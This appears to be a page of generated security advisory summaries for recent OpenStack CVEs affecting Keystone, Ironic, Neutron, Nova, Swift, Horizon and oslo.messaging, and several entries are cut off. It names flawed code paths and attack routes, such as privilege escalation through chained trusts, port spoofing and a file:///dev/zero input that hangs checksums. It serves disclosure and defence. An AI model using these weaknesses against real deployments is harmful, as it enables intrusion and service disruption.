These pages are published after PatchSiren validates generated defensive summaries against stored public CVE and source evidence.
OpenStack Horizon versions before 25.7.4 are vulnerable to a script injection issue. The vulnerability arises from the production of scripts for OpenStack RC file downloading that may contain crafted project names with shell metacharacters. This issue is considered a security hardening opportunity to address certain types of user error, rather than a traditional vulnerability. The CVSS score for this vuln [truncated]
A vulnerability was discovered in OpenStack Nova before version 33.0.2. The server create API does not properly strip certain hint data, which can lead to an instance being created without a Placement allocation. This issue has a CVSS score of 5.4 and is classified as MEDIUM severity.
CVE-2026-50589 is a vulnerability in OpenStack Ironic 32 before 37.0.0. An unauthenticated malicious user could submit a crafted JSON string to some endpoints on the API or JSON-RPC service and effect a service crash. The CVSS score for this vulnerability is 5.3, and the severity is MEDIUM.
CVE-2026-50266 is a security vulnerability in OpenStack Neutron that allows a project manager to bypass security group protections and enable spoofing on shared networks. A project manager can create or update a port on a shared network owned by another project and set device_owner to a value that has 'network:' at the beginning, such as 'network:dhcp'. The default port RBAC policies incorrectly included [truncated]
CVE-2026-44393 is a HIGH severity vulnerability in OpenStack oslo.messaging 1.0.0 through 17.3.0. The RabbitMQ driver fails to perform TLS hostname verification when connecting to the message broker. When `ssl_ca_file` is configured, the driver enables certificate chain validation but does not pass the expected broker hostname into the underlying TLS stack. This allows an attacker who can intercept contro [truncated]
A policy name mismatch in OpenStack Neutron's tagging controller allows project readers to create and update resource tags. The controller enforces plural policy action names (e.g., 'create_tags') while the policy rules use singular names (e.g., 'create_tag'). Under Neutron's default policy, mismatched names evaluate as allowed, granting unauthorized write access to tags on same-project resources. This af [truncated]
A vulnerability in OpenStack Keystone before 29.0.2 allows federated identity users to bypass token expiration policies through repeated token rescoping. When a federated user rescopes a token via POST /v3/auth/tokens, the handle_scoped_token() function in the mapped authentication plugin fails to propagate the original token's expires_at value to the new token. The token provider then issues a replacemen [truncated]
A privilege escalation vulnerability in OpenStack Keystone before 29.0.2 allows an attacker with the member role on a project to escalate to admin privileges by chaining application credential impersonation with Keystone trusts. The vulnerability stems from improper authorization validation where Keystone validates delegated roles against the victim's actual role assignments in the database rather than th [truncated]
An RBAC policy enforcement bypass vulnerability exists in OpenStack Keystone before version 29.0.2. The flaw resides in the `enforce_call` method, where the RBAC policy enforcer unconditionally merges the raw JSON request body into the policy enforcement dictionary via `policy_dict.update(json_input.copy())`. This operation overwrites trusted target data previously populated from database lookups. Because [truncated]
A denial-of-service vulnerability exists in OpenStack Swift's s3api middleware. The StreamingInput class enters an infinite loop when processing truncated aws-chunked PUT request bodies, causing proxy-server workers to become permanently unresponsive with escalating CPU and memory consumption. An authenticated attacker can exhaust all available proxy-server workers, resulting in complete service unavailab [truncated]
CVE-2026-44919 describes an availability issue in OpenStack Ironic image handling. In affected versions through 35.x before commit a3f6d73, a file:///dev/zero URL can cause checksum calculations to loop indefinitely, potentially consuming worker resources and delaying image-related operations.
CVE-2026-44916 is a low-severity issue in OpenStack Ironic affecting versions before 35.0.2 in a certain non-default configuration. The published description says instance_info['ks_template'] is rendered without sandboxing. Public records show the CVE was first published on 2026-05-08 and later modified on 2026-05-20, with references to a Launchpad bug, an OpenStack security advisory, and an oss-security [truncated]
A critical vulnerability was discovered in OpenStack Ironic, a popular open-source cloud infrastructure service. The issue allows users to request authorization to be sent to a remote endpoint during import operations, potentially exposing sensitive credentials. The vulnerability has a CVSS score of 7.7 and is considered HIGH severity. The affected versions of Ironic are 17.0.0 to 26.1.6, 27.0.0 to 29.0.5 [truncated]
CVE-2026-42510 affects OpenStack Ironic before 35.0.1. In a non-default configuration that includes the console interface, the issue can allow ipmitool execution. The supplied CVSS data rates it Medium (6.6), but the impact remains significant because the vector indicates network reachability, no user interaction, and high confidentiality, integrity, and availability impact with high privileges required.
A low-severity vulnerability was discovered in OpenStack Keystone, affecting versions 14 through 26 before 26.1.1, 27.0.0, 28.0.0, and 29.0.0. The issue allows an authenticated user with only a reader role to create EC2 credentials using a restricted application credential, potentially bypassing role restrictions.
CVE-2016-5737 is a cross-site scripting issue in OpenStack's puppet-gerrit configuration. The problem is that text/html is incorrectly marked as a safe mimetype, which can let a crafted review render as active HTML in a user's browser. The issue was publicly recorded by NVD on 2017-01-12, with a patch reference already available in the upstream commit and oss-security disclosure referenced by the CVE record.
